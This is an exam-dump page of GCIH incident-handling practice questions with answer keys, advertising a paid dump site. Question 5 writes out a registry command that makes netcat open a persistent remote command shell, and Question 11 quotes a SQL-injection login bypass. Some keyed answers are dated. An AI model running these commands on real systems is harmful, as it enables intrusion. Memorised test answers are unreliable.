A Review Of Printable GCIH Braindumps

Certleader offers free demo for GCIH exam. "GIAC Certified Incident Handler", also known as GCIH exam, is a GIAC Certification. This set of posts, Passing the GIAC GCIH exam, will help you answer those questions. The GCIH Questions & Answers covers all the knowledge points of the real exam. 100% real GIAC GCIH exams and revised by experts!

Online GCIH free questions and answers of New Version:

NEW QUESTION 1
In which of the following attacking methods does an attacker distribute incorrect IP address?

  • A. IP spoofing
  • B. Mac flooding
  • C. DNS poisoning
  • D. Man-in-the-middle

Answer: C

NEW QUESTION 2
You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

  • A. Nmap
  • B. Ethereal
  • C. Ettercap
  • D. Netcraft

Answer: D

NEW QUESTION 3
Which of the following statements are true about netcat?
Each correct answer represents a complete solution. Choose all that apply.

  • A. It provides special tunneling, such as UDP to TCP, with the possibility of specifying all network parameters.
  • B. It can be used as a file transfer solution.
  • C. It provides outbound and inbound connections for TCP and UDP ports.
  • D. The nc -z command can be used to redirect stdin/stdout from a program.

Answer: ABC

NEW QUESTION 4
Which of the following is an Internet mapping technique that relies on various BGP collectors that collect information such as routing updates and tables and provide this information publicly?

  • A. AS Route Inference
  • B. Path MTU discovery (PMTUD)
  • C. AS PATH Inference
  • D. Firewalking

Answer: C

NEW QUESTION 5
You run the following command on the remote Windows server 2003 computer:
c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d
"c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.

  • A. You want to perform banner grabbing.
  • B. You want to set the Netcat to execute command any time.
  • C. You want to put Netcat in the stealth mode.
  • D. You want to add the Netcat command to the Windows registry.

Answer: BCD

NEW QUESTION 6
Which of the following provides packet-level encryption between hosts in a LAN?

  • A. PPTP
  • B. IPsec
  • C. PFS
  • D. Tunneling protocol

Answer: B

NEW QUESTION 7
Which of the following is a network worm that exploits the RPC sub-system vulnerability present in the Microsoft Windows operating system?

  • A. Win32/Agent
  • B. WMA/TrojanDownloader.GetCodec
  • C. Win32/Conflicker
  • D. Win32/PSW.OnLineGames

Answer: C

NEW QUESTION 8
John works as an Ethical Hacker for Exambible Inc. He wants to find out the ports that are open in Exambible's server using a port scanner. However, he does not want to establish a full TCP connection.
Which of the following scanning techniques will he use to accomplish this task?

  • A. TCP FIN
  • B. TCP SYN/ACK
  • C. TCP SYN
  • D. Xmas tree

Answer: C

NEW QUESTION 9
Which of the following are open-source vulnerability scanners?

  • A. Nessus
  • B. Hackbot
  • C. NetRecon
  • D. Nikto

Answer: ABD

NEW QUESTION 10
Which of the following protocols uses only User Datagram Protocol (UDP)?

  • A. POP3
  • B. FTP
  • C. ICMP
  • D. TFTP

Answer: D

NEW QUESTION 11
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?

  • A. Use the escapeshellarg() function
  • B. Use the session_regenerate_id() function
  • C. Use the mysql_real_escape_string() function for escaping input
  • D. Use the escapeshellcmd() function

Answer: C

NEW QUESTION 12
Jane works as a Consumer Support Technician for ABC Inc. The company provides troubleshooting support to users. Jane is troubleshooting the computer of a user who has installed software that automatically gains full permissions on his computer. Jane has never seen this software before. Which of the following types of malware is the user facing on his computer?

  • A. Rootkits
  • B. Viruses
  • C. Spyware
  • D. Adware

Answer: A

NEW QUESTION 13
Which of the following rootkits is able to load the original operating system as a virtual machine, thereby enabling it to intercept all hardware calls made by the original operating system?

  • A. Kernel level rootkit
  • B. Boot loader rootkit
  • C. Hypervisor rootkit
  • D. Library rootkit

Answer: C

NEW QUESTION 14
Which of the following are the rules by which an organization operates?

  • A. Acts
  • B. Policies
  • C. Rules
  • D. Manuals

Answer: B

NEW QUESTION 15
Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

  • A. US Incident Management System (USIMS)
  • B. National Disaster Management System (NDMS)
  • C. National Emergency Management System (NEMS)
  • D. National Incident Management System (NIMS)

Answer: D

NEW QUESTION 16
Which of the following is used by attackers to obtain an authenticated connection on a network?

  • A. Denial-of-Service (DoS) attack
  • B. Replay attack
  • C. Man-in-the-middle attack
  • D. Back door

Answer: B

NEW QUESTION 17
......

Thanks for reading the newest GCIH exam dumps! We recommend you to try the PREMIUM 2passeasy GCIH dumps in VCE and PDF here: https://www.2passeasy.com/dumps/GCIH/ (328 Q&As Dumps)